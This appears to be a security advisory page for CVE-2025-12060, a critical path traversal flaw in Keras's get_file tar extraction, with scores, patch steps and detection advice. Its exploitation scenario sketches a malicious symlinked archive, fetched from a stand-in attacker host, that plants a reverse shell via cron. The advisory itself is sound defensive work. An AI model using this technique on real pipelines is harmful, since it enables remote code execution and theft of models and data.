CVE-2025-12060: keras: Path Traversal enables file access

GHSA-hjqc-jx6g-rwp9 CRITICAL PoC AVAILABLE
Published October 30, 2025
CISO Take

Upgrade Keras to 3.12.0 immediately — upgrading Python to 3.13.4 alone does NOT fix this, both components must be patched. Any ML pipeline calling keras.utils.get_file with extract=True against a remote or untrusted tar archive is exposed to arbitrary file write on the host filesystem, which trivially escalates to code execution. Audit all training and data ingestion automation for this pattern before your next pipeline run.

Risk Assessment

Critical risk for ML training infrastructure despite low current EPSS (0.00122). The CVSS 9.8 reflects zero prerequisites: no authentication, no privileges, no user interaction, fully network-exploitable. Real-world risk is highest in automated MLOps pipelines that fetch and extract remote datasets — an extremely common pattern. The dual-fix requirement (Python AND Keras must both be updated) creates high probability of incomplete remediation, leaving patched-feeling environments still vulnerable.

Affected Systems

Package Ecosystem Vulnerable Range Patched
keras pip <= 3.11.3 3.12.0
64.1K OpenSSF 7.0 1.5K dependents Pushed 7d ago 53% patched ~32d to patch Full package profile →

Do you use keras? You're affected.

Severity & Risk

CVSS 3.1
9.8 / 10
EPSS
0.1%
chance of exploitation in 30 days
Higher than 28% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV AC PR UI S C I A
AV Network
AC Low
PR None
UI None
S Unchanged
C High
I High
A High

Recommended Action

5 steps
  1. PATCH

    pip install 'keras>=3.12.0' — Python upgrade alone is NOT sufficient, both must be updated.

  2. AUDIT

    Search all codebases and pipeline configs for keras.utils.get_file calls with extract=True; flag any that pull from external or untrusted URLs.

  3. WORKAROUND (if patching delayed): Download tar files separately, validate with tarfile.extractall(filter='data') before processing.

  4. ISOLATE

    Run ML training in containers with AppArmor/seccomp profiles and filesystem mounts restricted to expected data directories.

  5. DETECT

    Alert on filesystem writes outside designated ML data directories during training jobs — unexpected writes to /etc, /usr, ~/.ssh, or Python site-packages during an ML run indicate active exploitation.

CISA SSVC Assessment

Decision Track
Exploitation none
Automatable No
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity Article 9 - Risk management system
ISO 42001
A.6.2 - Responsibilities related to AI system suppliers A.9.1 - AI system vulnerability handling
NIST AI RMF
GOVERN 1.1 - Policies and processes are in place to manage AI risks MANAGE 2.2 - Mechanisms are in place to sustain value of deployed AI systems
OWASP LLM Top 10
LLM05 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2025-12060?

Upgrade Keras to 3.12.0 immediately — upgrading Python to 3.13.4 alone does NOT fix this, both components must be patched. Any ML pipeline calling keras.utils.get_file with extract=True against a remote or untrusted tar archive is exposed to arbitrary file write on the host filesystem, which trivially escalates to code execution. Audit all training and data ingestion automation for this pattern before your next pipeline run.

Is CVE-2025-12060 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2025-12060, increasing the risk of exploitation.

How to fix CVE-2025-12060?

1. PATCH: pip install 'keras>=3.12.0' — Python upgrade alone is NOT sufficient, both must be updated. 2. AUDIT: Search all codebases and pipeline configs for keras.utils.get_file calls with extract=True; flag any that pull from external or untrusted URLs. 3. WORKAROUND (if patching delayed): Download tar files separately, validate with tarfile.extractall(filter='data') before processing. 4. ISOLATE: Run ML training in containers with AppArmor/seccomp profiles and filesystem mounts restricted to expected data directories. 5. DETECT: Alert on filesystem writes outside designated ML data directories during training jobs — unexpected writes to /etc, /usr, ~/.ssh, or Python site-packages during an ML run indicate active exploitation.

What systems are affected by CVE-2025-12060?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, data ingestion pipelines, MLOps automation, model serving.

What is the CVSS score for CVE-2025-12060?

CVE-2025-12060 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 0.10%.

Technical Details

NVD Description

The keras.utils.get_file API in Keras, when used with the extract=True option for tar archives, is vulnerable to a path traversal attack. The utility uses Python's tarfile.extractall function without the filter="data" feature. A remote attacker can craft a malicious tar archive containing special symlinks, which, when extracted, allows them to write arbitrary files to any location on the filesystem outside of the intended destination folder. This vulnerability is linked to the underlying Python tarfile weakness, identified as CVE-2025-4517. Note that upgrading Python to one of the versions that fix CVE-2025-4517 (e.g. Python 3.13.4) is not enough. One additionally needs to upgrade Keras to a version with the fix (Keras 3.12).

Exploitation Scenario

Adversary hosts a malicious dataset archive at a URL that appears legitimate — either via a typosquatted dataset mirror, a compromised data host, or a man-in-the-middle on an HTTP download. An MLOps pipeline or data scientist calls keras.utils.get_file('https://attacker-host/imagenet-subset.tar.gz', extract=True). The tar archive contains a symlink entry resolving to /etc/cron.d/ml-runner, followed by a file entry that writes a reverse shell payload to that symlink target. Keras calls tarfile.extractall without filter='data', the symlink resolves outside the destination, and the payload lands on the host. On next cron tick, the attacker has RCE as the ML training user — often with GPU cluster access, model weights, and training data.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Timeline

Published
October 30, 2025
Last Modified
December 2, 2025
First Seen
October 30, 2025

Related Vulnerabilities